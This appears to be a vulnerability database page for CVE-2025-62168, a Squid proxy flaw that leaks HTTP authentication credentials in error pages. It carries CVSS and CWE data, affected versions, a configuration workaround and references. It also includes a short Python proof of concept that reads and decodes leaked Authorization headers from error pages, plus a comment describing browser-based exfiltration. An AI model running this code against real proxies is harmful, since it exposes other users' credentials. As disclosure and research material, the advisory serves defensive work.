Security Vulnerability Report

CVE-2025-62168 CVSS 10.0 CRITICAL

Published: 2025-10-17 17:15:49
Last Modified: 2025-11-05 17:15:45

Description

Squid is a caching proxy for the Web. In Squid versions prior to 7.2, a failure to redact HTTP authentication credentials in error handling allows information disclosure. The vulnerability allows a script to bypass browser security protections and learn the credentials a trusted client uses to authenticate. This potentially allows a remote client to identify security tokens or credentials used internally by a web application using Squid for backend load balancing. These attacks do not require Squid to be configured with HTTP authentication. The vulnerability is fixed in version 7.2. As a workaround, disable debug information in administrator mailto links generated by Squid by configuring squid.conf with email_err_data off.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

The raw record at the end of this report carries two CVSS v3.1 metrics: the 10.0 CRITICAL vector above (type Secondary, scope Changed, C:H/I:H/A:N) and the Primary metric CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, which scores 7.5 HIGH (scope Unchanged, confidentiality impact only). Weakness classifications recorded for the CVE: CWE-209 (error message information exposure) and CWE-550 (server-generated error message containing sensitive information).

Configurations (Affected Products)

cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:* - VULNERABLE
Squid < 7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62168 PoC - Squid HTTP Authentication Credentials Disclosure
# This PoC demonstrates how an attacker can extract HTTP authentication
# credentials leaked through Squid's error pages.

import requests
import base64

# Target Squid proxy
PROXY_URL = "http://target-squid-proxy:3128"

# Step 1: Craft a request that will trigger Squid's error page
# containing leaked authentication headers
target_url = f"{PROXY_URL}/nonexistent-resource-that-triggers-error"

# Step 2: Include Authorization header with victim's credentials
# (In a real attack, the victim's browser would automatically include this)
victim_credentials = base64.b64encode(b"admin:password123").decode()
headers = {
    "Authorization": f"Basic {victim_credentials}",
    "User-Agent": "Mozilla/5.0 (compatible; AttackerBot/1.0)",
}

# Step 3: Send the request - Squid will return an error page
# that includes the full request headers including Authorization
try:
    response = requests.get(target_url, headers=headers, timeout=10)

    # Step 4: Extract leaked credentials from the error page
    if "Authorization" in response.text:
        print("[!] Vulnerability confirmed - Authorization header leaked!")
        # Parse the leaked authorization header
        for line in response.text.split("\n"):
            if "Authorization" in line:
                print(f"[+] Leaked header: {line.strip()}")
                # Extract and decode the credentials
                leaked_auth = line.split(":")[-1].strip()
                if "Basic" in leaked_auth:
                    decoded = base64.b64decode(leaked_auth.split()[-1])
                    print(f"[+] Decoded credentials: {decoded.decode()}")
    else:
        print("[-] Authorization header not found in response")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Note: A real-world attack would use a malicious webpage that causes
# the victim's browser to make requests through the Squid proxy,
# then use JavaScript to read the error page content and exfiltrate
# the credentials via the attacker's server.
```

References

- https://github.com/squid-cache/squid/commit/0951a0681011dfca3d78c84fd7f1e19c78a4443f (Patch)
- https://github.com/squid-cache/squid/security/advisories/GHSA-c8cc-phh7-xmxr (Mitigation, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2025/11/05/6
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-62168", "sourceIdentifier": "[email protected]", "published": "2025-10-17T17:15:49.037", "lastModified": "2025-11-05T17:15:45.087", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Squid is a caching proxy for the Web. In Squid versions prior to 7.2, a failure to redact HTTP authentication credentials in error handling allows information disclosure. The vulnerability allows a script to bypass browser security protections and learn the credentials a trusted client uses to authenticate. This potentially allows a remote client to identify security tokens or credentials used internally by a web application using Squid for backend load balancing. These attacks do not require Squid to be configured with HTTP authentication. The vulnerability is fixed in version 7.2. As a workaround, disable debug information in administrator mailto links generated by Squid by configuring squid.conf with email_err_data off."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}, {"lang": "en", "value": "CWE-550"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2", "matchCriteriaId": "77C03B70-0C3B-44B0-B44E-AC3C736A6D69"}]}]}], "references": [{"url": "https://github.com/squid-cache/squid/commit/0951a0681011dfca3d78c84fd7f1e19c78a4443f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/squid-cache/squid/security/advisories/GHSA-c8cc-phh7-xmxr", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/05/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
```